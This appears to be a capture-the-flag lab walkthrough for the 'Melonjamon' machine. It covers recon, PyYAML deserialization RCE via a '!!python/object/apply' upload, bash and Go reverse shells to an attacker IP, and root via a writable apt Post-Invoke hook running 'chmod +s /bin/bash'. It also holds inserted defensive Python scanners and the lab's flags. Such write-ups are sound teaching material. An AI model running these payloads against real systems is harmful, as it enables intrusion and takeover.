TheHackersLabs-Melonjamon-Walkthrough
城南花已开

Information gathering

Service discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.165 08:00:27:ac:62:19 (Unknown)
192.168.60.254 00:50:56:f9:b3:de (Unknown)

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.977 seconds (129.49 hosts/sec). 4 responded
export ip=192.168.60.165
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.165:22
Open 192.168.60.165:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-25 19:54 CST
Initiating ARP Ping Scan at 19:54
Scanning 192.168.60.165 [1 port]
Completed ARP Ping Scan at 19:54, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:54
Completed Parallel DNS resolution of 1 host. at 19:54, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:54
Scanning 192.168.60.165 [2 ports]
Discovered open port 80/tcp on 192.168.60.165
Discovered open port 22/tcp on 192.168.60.165
Completed SYN Stealth Scan at 19:54, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.60.165
Host is up, received arp-response (0.00096s latency).
Scanned at 2025-01-25 19:54:25 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:AC:62:19 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Edit /etc/hosts and add a hostname for the target.

Run a directory scan.

sudo vim /etc/hosts
192.168.60.165 melonjamon.thl
❯ gobuster dir -u http://melonjamon.thl -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://melonjamon.thl
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/javascript (Status: 301) [Size: 321] [--> http://melonjamon.thl/javascript/]
/gettingstarted (Status: 308) [Size: 261] [--> http://melonjamon.thl/gettingstarted/]
/server-status (Status: 403) [Size: 279]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================

There is a file upload entry point.

YAML deserialization

A hint is hidden in the page source.

Base64-decode it.

❯ echo "eWFtbDogdGhlIHBhZ2UgaXMgdW5kZXIgY29uc3RydWN0aW9u"|base64 -d
yaml: the page is under construction%

I got stuck here.

From other people's write-ups I learned that this is YAML deserialization.

Python Yaml Deserialization - HackTricks

Is it YAML? | Peter Murphy

0-Day

The site uses PyYAML as its underlying parser and deserializes the upload with load.

So we can craft our own serialized YAML data.

First try a ping to see whether the target executes it.

vim exp.yaml
yaml: !!python/object/apply:subprocess.check_output [['ping', '-c', '3', '192.168.60.100']]
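As an added example (not the challenge's code nor the author's), here is the defender's side of this step: a small pre-parse gate in Python that rejects an uploaded YAML document carrying any node tag, including the !!python/object/apply form used above, before it reaches a parser. The real fix is to parse with yaml.safe_load (SafeLoader), which has no constructors for the python/* tags; this gate only adds a reject-and-log point in front of it. The function names (find_tags, is_safe_upload) and the sample inputs are my own.

```python
import re
from typing import List, Tuple

# Added example, not the challenge's own code. The root fix for the bug on this
# page is to never pass untrusted input to yaml.load() with the default,
# FullLoader or UnsafeLoader: use yaml.safe_load(text) (SafeLoader), which has
# no constructors for the python/* tags. This scanner is an extra gate in front
# of the upload handler, so tagged documents are rejected and logged before any
# parser sees them; it is not a replacement for SafeLoader.

_QUOTED = re.compile(r'"(?:[^"\\]|\\.)*"|\'(?:[^\']|\'\')*\'')
_COMMENT = re.compile(r'(?:^|\s)#.*$')
# A YAML node tag: "!" at a token boundary followed by the verbatim form !<...>,
# the shorthand forms !!suffix / !handle!suffix, or a local tag !name.
_TAG = re.compile(r'(?:^|(?<=[\s\[{,]))(!(?:<[^>\s]*>|[!\w./:,-]*))')


def find_tags(text: str) -> List[Tuple[int, str]]:
    """Return (line_number, tag) for every node tag and %TAG directive.

    Quoted scalars and comments are blanked first, so a "!" inside a string
    value ("hello !world") is not reported.
    """
    hits: List[Tuple[int, str]] = []
    for n, raw in enumerate(text.splitlines(), start=1):
        if raw.startswith("%TAG"):
            # A %TAG directive re-maps tag handles, so a document could name a
            # python/* tag without the literal "!!python" prefix; report it too.
            hits.append((n, raw.strip()))
            continue
        line = _QUOTED.sub('""', raw)
        line = _COMMENT.sub("", line)
        for m in _TAG.finditer(line):
            hits.append((n, m.group(1)))
    return hits


def is_safe_upload(text: str) -> bool:
    """Upload policy: the form only needs plain key/value text, so any tag is rejected."""
    return not find_tags(text)


if __name__ == "__main__":
    # Constructed inputs: the page's decoded hint and the ping probe from this write-up.
    samples = [
        "yaml: the page is under construction\n",
        "yaml: !!python/object/apply:subprocess.check_output [['ping', '-c', '3', '192.168.60.100']]\n",
    ]
    for doc in samples:
        verdict = "ACCEPT" if is_safe_upload(doc) else "REJECT"
        print(f"{verdict} {find_tags(doc)} {doc.strip()!r}")
```

Because a plain scalar can never begin with "!" in YAML, treating every "!" token as a tag is safe for this upload form; the check is deliberately stricter than "does it contain !!python", since tag handles can be remapped by a %TAG directive and the verbatim !<tag:yaml.org,2002:python/...> spelling does not contain that prefix at all.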

Upload the YAML.

Capturing the traffic shows that the output is echoed back.

Now try a reverse shell command.

Modify the YAML:

cat exp.yaml
yaml: !!python/object/apply:os.system ["bash -c 'bash -i >& /dev/tcp/192.168.60.100/4444 0>&1'"]

User privilege escalation

Re-upload the file and listen on the port.

❯ pwncat-cs -lp 4444
[19:03:58] Welcome to pwncat 🐈! __main__.py:164
bound to 0.0.0.0:4444 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
bound to 0.0.0.0:4444 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[19:06:51] received connection from 192.168.60.165:45142 bind.py:84
[19:07:10] 192.168.60.165:45142: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@TheHackersLabs-Melonjamon:/$ cat /etc/passwd|grep /bin/bash
root:x:0:0:root:/root:/bin/bash
melon:x:1001:1001:,,,:/home/melon:/bin/bash

There is a user named melon.

www-data has sudo rights.

(remote) www-data@TheHackersLabs-Melonjamon:/$ sudo -l
sudo: unable to resolve host TheHackersLabs-Melonjamon: Name or service not known
Matching Defaults entries for www-data on TheHackersLabs-Melonjamon:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User www-data may run the following commands on TheHackersLabs-Melonjamon:
(melon) NOPASSWD: /usr/bin/go

Golang reverse shell

We can use go to escalate to melon.

GTFOBins has no entry for go, though.

But you can ask GPT how to build a reverse shell in Go.

package main

import (
    "os/exec"
    "net"
)

func main() {
    c, _ := net.Dial("tcp", "192.168.60.100:4444") // connect back to the remote machine
    cmd := exec.Command("sh")                      // start a shell
    cmd.Stdin = c                                   // use the connection as stdin
    cmd.Stdout = c                                  // use the connection as stdout
    cmd.Stderr = c                                  // use the connection as stderr
    cmd.Run()                                       // run the command
}

You can also find it on revshells.
(remote) www-data@TheHackersLabs-Melonjamon:/tmp$ echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.60.100:4444");cmd:=exec.Command("sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/exp.go
(remote) www-data@TheHackersLabs-Melonjamon:/tmp$ sudo -u melon /usr/bin/go run exp.go

Root privilege escalation

Scheduled task

Run it; it is a bit slow, but the shell comes back.

❯ pwncat-cs -lp 4444
[22:04:28] Welcome to pwncat 🐈! __main__.py:164
[22:05:35] received connection from 192.168.60.165:47334 bind.py:84
[22:05:35] 0.0.0.0:4444: upgrading from /usr/bin/dash to manager.py:957
/usr/bin/bash
[22:05:55] 192.168.60.165:47334: registered new host w/ db manager.py:957
(local) pwncat$

(remote) melon@TheHackersLabs-Melonjamon:/tmp$ cd ~
(remote) melon@TheHackersLabs-Melonjamon:/home/melon$ ls
user.txt
(remote) melon@TheHackersLabs-Melonjamon:/home/melon$ cat user.txt
043cdfa844231ba06fb3fd063252a7d5

Information gathering again

I searched for a long time without finding anything useful.

But after uploading pspy64 I noticed that root periodically runs apt update.

2025/01/31 15:39:38 CMD: UID=0     PID=68818  | /usr/bin/apt update
2025/01/31 15:39:38 CMD: UID=0 PID=68819 | /usr/bin/apt update
2025/01/31 15:39:38 CMD: UID=0 PID=68820 | sh -c test -x /usr/bin/apt-show-versions || exit 0 ; apt-show-versions -i
2025/01/31 15:39:39 CMD: UID=0 PID=68821 | /usr/bin/perl -w /usr/bin/apt-show-versions -i
2025/01/31 15:39:39 CMD: UID=0 PID=68822 | /usr/bin/perl -w /usr/bin/apt-show-versions -i
2025/01/31 15:39:39 CMD: UID=0 PID=68823 | /usr/bin/perl -w /usr/bin/apt-show-versions -i
2025/01/31 15:39:39 CMD: UID=0 PID=68824 | sh -c apt-get indextargets -o Dir::State::lists=/var/lib/apt/lists/ --format='$(FILENAME)' 'Created-By: Packages'
2025/01/31 15:39:39 CMD: UID=0 PID=68825 | apt-get indextargets -o Dir::State::lists=/var/lib/apt/lists/ --format=$(FILENAME) Created-By: Packages
2025/01/31 15:39:39 CMD: UID=0 PID=68826 | apt-get indextargets -o Dir::State::lists=/var/lib/apt/lists/ --format=$(FILENAME) Created-By: Packages
2025/01/31 15:39:39 CMD: UID=0 PID=68827 | /usr/bin/perl -w /usr/bin/apt-show-versions -i
2025/01/31 15:39:39 CMD: UID=0 PID=68828 | /usr/bin/perl -w /usr/bin/apt-show-versions -i
2025/01/31 15:39:41 CMD: UID=0 PID=68829 | /usr/bin/perl -w /usr/bin/apt-show-versions -i
2025/01/31 15:39:41 CMD: UID=0 PID=68830 | /usr/bin/perl -w /usr/bin/apt-show-versions -i
2025/01/31 15:39:41 CMD: UID=0 PID=68831 | /usr/bin/perl -w /usr/bin/apt-show-versions -i
2025/01/31 15:39:41 CMD: UID=0 PID=68832 | /usr/bin/perl -w /usr/bin/apt-show-versions -i
2025/01/31 15:39:41 CMD: UID=0 PID=68833 | /usr/bin/perl -w /usr/bin/apt-show-versions -i
2025/01/31 15:39:41 CMD: UID=0 PID=68834 | /usr/bin/apt update
2025/01/31 15:39:43 CMD: UID=0 PID=68835 | /usr/bin/apt update

Looking at apt's configuration, I found that one entry belongs to the melon user.

(remote) melon@TheHackersLabs-Melonjamon:/tmp$ ls -la /etc/apt/
total 36
drwxr-xr-x 8 root root 4096 Jul 15 2024 .
drwxr-xr-x 74 root root 4096 Jan 31 15:28 ..
drwxr-xr-x 2 melon melon 4096 Aug 4 13:18 apt.conf.d
drwxr-xr-x 2 root root 4096 May 25 2023 auth.conf.d
drwxr-xr-x 2 root root 4096 May 25 2023 keyrings
drwxr-xr-x 2 root root 4096 May 25 2023 preferences.d
-rw-r--r-- 1 root root 780 Jul 15 2024 sources.list
drwxr-xr-x 2 root root 4096 May 25 2023 sources.list.d
-rw-r--r-- 1 root root 0 Jul 15 2024 sources.list~
drwxr-xr-x 2 root root 4096 Jul 15 2024 trusted.gpg.d

It turns out I overlooked this when I ran find earlier.

(remote) melon@TheHackersLabs-Melonjamon:/tmp$ find / -user melon 2>/dev/null |grep -Ev "proc|go-build"
/tmp/pspy64
/usr/lib/go-1.19/bin/go
/home/melon
/home/melon/.bashrc
/home/melon/.local
/home/melon/.local/share
/home/melon/.local/share/nano
/home/melon/user.txt
/home/melon/.bash_logout
/home/melon/.profile
/home/melon/.cache
/etc/apt/apt.conf.d
/etc/apt/apt.conf.d/00CDMountPoint
/etc/apt/apt.conf.d/01autoremove
/etc/apt/apt.conf.d/70debconf
/etc/apt/apt.conf.d/00trustcdrom
/etc/apt/apt.conf.d/20apt-show-versions
/dev/pts/2
/dev/pts/1

Let's modify apt's configuration. The file 20apt-show-versions runs test -x /usr/bin/apt-show-versions || exit 0 ; apt-show-versions -i again after every successful apt update.

(remote) melon@TheHackersLabs-Melonjamon:/etc/apt/apt.conf.d$ cat 20apt-show-versions
// When Apt's cache is updated (i.e. apt-get update)
APT::Update::Post-Invoke-Success {
"test -x /usr/bin/apt-show-versions || exit 0 ; apt-show-versions -i";
};
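As an added example, not the challenge's code: a Python audit script that mirrors the check a defender would run against this misconfiguration. It parses apt.conf hook keys (APT::Update::Post-Invoke-Success and the related Pre/Post-Invoke and DPkg keys) from each file in an apt.conf.d-style directory and flags any file or directory that is not owned by root or is writable by group or others, since apt runs those commands as root. The directory it builds is constructed to mirror this page (a 20apt-show-versions hook file with loose permissions); the function names are my own and the parser only handles the flat 'Key { "..."; };' and 'Key:: "...";' forms.

```python
import os
import re
import stat
import tempfile
from typing import Dict, List

# Added example, not the challenge's own code. apt runs the commands configured
# under these keys as root, so a hook file (or the apt.conf.d directory itself)
# that a non-root user owns or can write to is a root-equivalent foothold,
# exactly the misconfiguration exploited on this page.
HOOK_KEYS = (
    "APT::Update::Pre-Invoke",
    "APT::Update::Post-Invoke",
    "APT::Update::Post-Invoke-Success",
    "DPkg::Pre-Invoke",
    "DPkg::Post-Invoke",
    "DPkg::Pre-Install-Pkgs",
)

# apt.conf syntax, flat form only:  Key { "cmd"; "cmd2"; };   or   Key:: "cmd";
_COMMENT_OR_STRING = re.compile(r'"(?:[^"\\]|\\.)*"|//[^\n]*|#[^\n]*|/\*.*?\*/', re.S)
_BLOCK = re.compile(r'(?P<key>[\w:.-]+)\s*\{(?P<body>[^}]*)\}')
_APPEND = re.compile(r'(?P<key>[\w:.-]+?)::\s*"((?:[^"\\]|\\.)*)"\s*;')
_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"')


def parse_hooks(text: str) -> Dict[str, List[str]]:
    """Return {hook key: [command, ...]} for the hook keys found in apt.conf text."""
    # Drop //, # and /* */ comments but keep string literals intact.
    text = _COMMENT_OR_STRING.sub(lambda m: m.group(0) if m.group(0).startswith('"') else "", text)
    hooks: Dict[str, List[str]] = {}
    for m in _BLOCK.finditer(text):
        if m.group("key") in HOOK_KEYS:
            hooks.setdefault(m.group("key"), []).extend(_STRING.findall(m.group("body")))
    for m in _APPEND.finditer(text):
        if m.group("key") in HOOK_KEYS:
            hooks.setdefault(m.group("key"), []).append(m.group(2))
    return hooks


def audit_apt_conf_dir(path: str) -> List[str]:
    """Findings for a directory laid out like /etc/apt/apt.conf.d."""
    findings: List[str] = []

    def check_perms(p: str) -> None:
        st = os.stat(p)
        if st.st_uid != 0:
            findings.append(f"{p}: owned by uid {st.st_uid}, not root")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(f"{p}: group/world writable")

    check_perms(path)
    for name in sorted(os.listdir(path)):
        full = os.path.join(path, name)
        if not os.path.isfile(full):
            continue
        check_perms(full)
        with open(full, encoding="utf-8", errors="replace") as fh:
            for key, cmds in parse_hooks(fh.read()).items():
                for cmd in cmds:
                    findings.append(f"{full}: {key} runs as root: {cmd}")
    return findings


def build_sample_dir() -> str:
    """Constructed apt.conf.d replica: one harmless file and one group-writable hook file."""
    d = tempfile.mkdtemp(prefix="apt.conf.d-")
    harmless = os.path.join(d, "01autoremove")
    with open(harmless, "w", encoding="utf-8") as fh:
        fh.write('APT::NeverAutoRemove { "^firmware-linux.*"; };\n')
    os.chmod(harmless, 0o644)
    hook = os.path.join(d, "20apt-show-versions")
    with open(hook, "w", encoding="utf-8") as fh:
        fh.write("// When Apt's cache is updated (i.e. apt-get update)\n"
                 "APT::Update::Post-Invoke-Success {\n"
                 '"test -x /usr/bin/apt-show-versions || exit 0 ; apt-show-versions -i";\n'
                 "};\n")
    os.chmod(hook, 0o664)  # group-writable: stands in for the melon-owned directory on the page
    return d


if __name__ == "__main__":
    # Audit the real directory when present, otherwise the constructed replica.
    target = "/etc/apt/apt.conf.d" if os.path.isdir("/etc/apt/apt.conf.d") else build_sample_dir()
    for line in audit_apt_conf_dir(target):
        print(line)
```

Every hook command is reported even when its file is correctly owned, because a Post-Invoke-Success entry is a root execution path that should be on the inventory; the ownership and mode findings are the ones that turn it into the privilege escalation shown on this page.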

So we can simply change that command.

Give bash the SUID bit.

(remote) melon@TheHackersLabs-Melonjamon:/etc/apt/apt.conf.d$ vi 20apt-show-versions
(remote) melon@TheHackersLabs-Melonjamon:/etc/apt/apt.conf.d$ cat 20apt-show-versions
// When Apt's cache is updated (i.e. apt-get update)
APT::Update::Post-Invoke-Success {
"chmod +s /bin/bash";
};

Monitoring the processes shows that it executed.

2025/01/31 15:50:39 CMD: UID=0     PID=71892  | /usr/bin/apt update
2025/01/31 15:50:39 CMD: UID=0 PID=71891 | /usr/bin/apt update
2025/01/31 15:50:39 CMD: UID=0 PID=71893 | sh -c chmod +s /bin/bash
2025/01/31 15:50:39 CMD: UID=0 PID=71894 | /usr/bin/apt update
2025/01/31 15:50:40 CMD: UID=0 PID=71895 | /usr/bin/apt update
^C(remote) melon@TheHackersLabs-Melonjamon:/tmp$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1265648 Mar 29 2024 /bin/bash
(remote) melon@TheHackersLabs-Melonjamon:/tmp$ bash -p
(remote) root@TheHackersLabs-Melonjamon:/tmp# id
uid=1001(melon) gid=1001(melon) euid=0(root) egid=0(root) groups=0(root),100(users),1001(melon)
(remote) root@TheHackersLabs-Melonjamon:/tmp# whoami
root
(remote) root@TheHackersLabs-Melonjamon:/tmp# cat /root/root.txt
06945fade02bb197ca68b33ed535f808

I don't know how the periodic execution is implemented, though; root has no crontab set. Oh well, I couldn't be bothered to look 😀
